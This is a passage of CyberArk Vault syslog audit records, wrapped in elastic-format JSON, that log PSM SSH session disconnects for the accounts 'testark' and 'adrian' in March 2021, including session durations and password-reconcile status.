ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:00:21","IsoTimestamp":"2021-03-15T15:00:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM 
Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:47:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:47:01\n 2021-03-11T17:47:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating 
System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:47:01","IsoTimestamp":"2021-03-11T17:47:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:48:40Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:40\n 2021-03-11T17:48:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 
09:48:40","IsoTimestamp":"2021-03-11T17:48:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:55:02Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:55:02\n 2021-03-11T17:55:02Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:55:02","IsoTimestamp":"2021-03-11T17:55:02Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating 
System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:56:42Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:42\n 2021-03-11T17:56:42Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:42","IsoTimestamp":"2021-03-11T17:56:42Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM 
Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T20:23:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:30\n 2021-03-11T20:23:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:30","IsoTimestamp":"2021-03-11T20:23:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:49:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:54\n 2021-03-14T13:49:54Z\n VAULT\n Cyber-Ark\n 
Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:54","IsoTimestamp":"2021-03-14T13:49:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:51:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:51:35\n 2021-03-14T13:51:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:51:35","IsoTimestamp":"2021-03-14T13:51:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:33:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:30\n 2021-03-15T10:33:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:30","IsoTimestamp":"2021-03-15T10:33:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:34:50Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:34:50\n 
2021-03-15T10:34:50Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:34:50","IsoTimestamp":"2021-03-15T10:34:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T11:12:09Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 04:12:09\n 2021-03-15T11:12:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n 
ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 04:12:09","IsoTimestamp":"2021-03-15T11:12:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T13:18:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:36\n 2021-03-15T13:18:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\n PSM Disconnect\n \n \n \n \n \n 
\n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:36","IsoTimestamp":"2021-03-15T13:18:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:11\n 2021-03-15T14:08:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:11","IsoTimestamp":"2021-03-15T14:08:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating 
System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:36\n 2021-03-15T14:08:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:36","IsoTimestamp":"2021-03-15T14:08:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;","Message":"PSM 
Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-15T15:00:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:00:21\n 2021-03-15T15:00:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 